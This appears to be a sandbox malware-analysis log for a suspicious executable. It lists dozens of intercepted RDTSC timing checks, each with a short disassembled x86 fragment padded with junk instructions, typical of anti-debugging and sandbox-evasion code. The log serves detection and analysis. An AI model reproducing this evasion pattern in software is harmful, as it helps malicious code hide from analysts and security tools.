Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1824CBB second address: 1824CE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jnp 00007F7B212E85CCh 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1824F3E second address: 1824F54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 cmc 0x00000009 push 00000004h 0x0000000b mov edi, 60B9FF18h 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1824F54 second address: 1824F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1824F58 second address: 1824F62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18252A1 second address: 18252A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1825656 second address: 182566B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7B216C3181h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186D6B6 second address: 186D6E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7B212E85D9h 0x0000000b pop ebx 0x0000000c jp 00007F7B212E85F6h 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F7B212E85C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186D85E second address: 186D867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186D867 second address: 186D883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F7B212E85C6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007F7B212E85CAh 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b pop eax 0x0000001c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186D9DD second address: 186D9EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edx 0x00000008 push eax 0x00000009 je 00007F7B216C3176h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 186DB36 second address: 186DB3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1870FDC second address: 1870FEE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F7B216C3176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F7B216C317Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1870FEE second address: 1870FF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1870FF2 second address: 1870FF7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187087B second address: 187089A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85D5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187089A second address: 187089E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187089E second address: 18708A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18708A2 second address: 18708AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18708AD second address: 18708B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1870A6A second address: 1870A72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1870A72 second address: 1870A76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1870BB2 second address: 1870BC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B216C317Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1870BC3 second address: 1870BD9 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B212E85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007F7B212E85C6h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1872F7D second address: 1872F85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1878903 second address: 1878921 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007F7B212E85D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1877C26 second address: 1877C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F7B216C3176h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1878488 second address: 187848C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187848C second address: 1878492 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1878492 second address: 187849D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7B212E85C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187AF27 second address: 187AF7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3185h 0x00000007 jmp 00007F7B216C3189h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e ja 00007F7B216C31B5h 0x00000014 push eax 0x00000015 push edx 0x00000016 jng 00007F7B216C3176h 0x0000001c jmp 00007F7B216C3184h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187B0D6 second address: 187B0EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F7B212E85D3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187B0EF second address: 187B111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F7B216C3186h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1880E2B second address: 1880E56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a jmp 00007F7B212E85CFh 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1880E56 second address: 1880E5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187F60B second address: 187F60F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FA36 second address: 187FA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B216C3183h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FA4D second address: 187FA57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F7B212E85C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FA57 second address: 187FA69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F7B216C3176h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FA69 second address: 187FA7C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F7B212E85CDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FA7C second address: 187FA81 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FBE4 second address: 187FBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 jo 00007F7B212E85C6h 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FD60 second address: 187FD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FD66 second address: 187FD6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18250FB second address: 1825114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B216C3184h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1825114 second address: 182511A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182511A second address: 182519B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C317Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push edx 0x0000000e jmp 00007F7B216C317Ah 0x00000013 pop edx 0x00000014 jbe 00007F7B216C3178h 0x0000001a push eax 0x0000001b pop eax 0x0000001c popad 0x0000001d nop 0x0000001e mov ebx, dword ptr [ebp+12B761E4h] 0x00000024 je 00007F7B216C317Ch 0x0000002a mov edx, dword ptr [ebp+129C1BA9h] 0x00000030 add eax, ebx 0x00000032 or ecx, 0E348381h 0x00000038 push eax 0x00000039 push edi 0x0000003a jnp 00007F7B216C317Ch 0x00000040 jg 00007F7B216C3176h 0x00000046 pop edi 0x00000047 mov dword ptr [esp], eax 0x0000004a push 00000000h 0x0000004c push ecx 0x0000004d call 00007F7B216C3178h 0x00000052 pop ecx 0x00000053 mov dword ptr [esp+04h], ecx 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc ecx 0x00000060 push ecx 0x00000061 ret 0x00000062 pop ecx 0x00000063 ret 0x00000064 push 00000004h 0x00000066 mov dl, ah 0x00000068 nop 0x00000069 push eax 0x0000006a push edx 0x0000006b push eax 0x0000006c push edx 0x0000006d push eax 0x0000006e push edx 0x0000006f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182519B second address: 182519F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 182519F second address: 18251A5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FEE1 second address: 187FEED instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F7B212E85C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FEED second address: 187FF0C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F7B216C3176h 0x00000009 pop edx 0x0000000a pushad 0x0000000b jl 00007F7B216C3176h 0x00000011 push edi 0x00000012 pop edi 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jbe 00007F7B216C3184h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 187FF0C second address: 187FF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18800A1 second address: 18800AF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F7B216C3176h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18863D1 second address: 18863D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18863D5 second address: 18863F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3182h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18863F0 second address: 18863F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18863F6 second address: 18863FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1886BFF second address: 1886C03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1886C03 second address: 1886C0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1886C0D second address: 1886C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B212E85CEh 0x00000007 je 00007F7B212E85DBh 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F7B212E85D3h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jo 00007F7B212E85E4h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1886C44 second address: 1886C4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1886C4A second address: 1886C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1887221 second address: 188723F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7B216C3189h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 188D066 second address: 188D072 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F7B212E85C6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1890CFB second address: 1890CFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17D7A15 second address: 17D7A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 17D7A19 second address: 17D7A3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3189h 0x00000007 jbe 00007F7B216C3176h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 189034B second address: 189034F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18904AD second address: 18904B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop edx 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 189070F second address: 1890747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7B212E85D4h 0x00000009 pop ecx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c jno 00007F7B212E85D9h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18908A5 second address: 18908C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7B216C3188h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18908C1 second address: 18908D9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7B212E85D3h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F7B212E85CBh 0x0000000f push ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18908D9 second address: 1890907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 js 00007F7B216C3193h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1890907 second address: 189091A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 jns 00007F7B212E85CEh 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1890A22 second address: 1890A4F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F7B216C3176h 0x00000008 jne 00007F7B216C3176h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 ja 00007F7B216C317Ch 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F7B216C317Eh 0x0000001e rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1890A4F second address: 1890A5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7B212E85C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 189656D second address: 1896573 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18966FA second address: 18966FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1896B3C second address: 1896B48 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jng 00007F7B216C3176h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1896B48 second address: 1896B4D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1897286 second address: 1897290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7B216C3176h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1897290 second address: 1897296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 1897B0F second address: 1897B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 189CF5E second address: 189CF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F7B212E85D1h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jns 00007F7B212E85DEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 189CF95 second address: 189CFB4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7B216C318Ah 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F7B216C3182h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18A200B second address: 18A2011 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18A2011 second address: 18A2019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18A2019 second address: 18A201D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18A2322 second address: 18A2327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18AE728 second address: 18AE74E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7B212E85C6h 0x00000008 jmp 00007F7B212E85CFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F7B212E85CBh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18AE74E second address: 18AE754 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f7qbEfJl0B.exeRDTSC instruction interceptor: First address: 18B369E second address: 18B36A7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
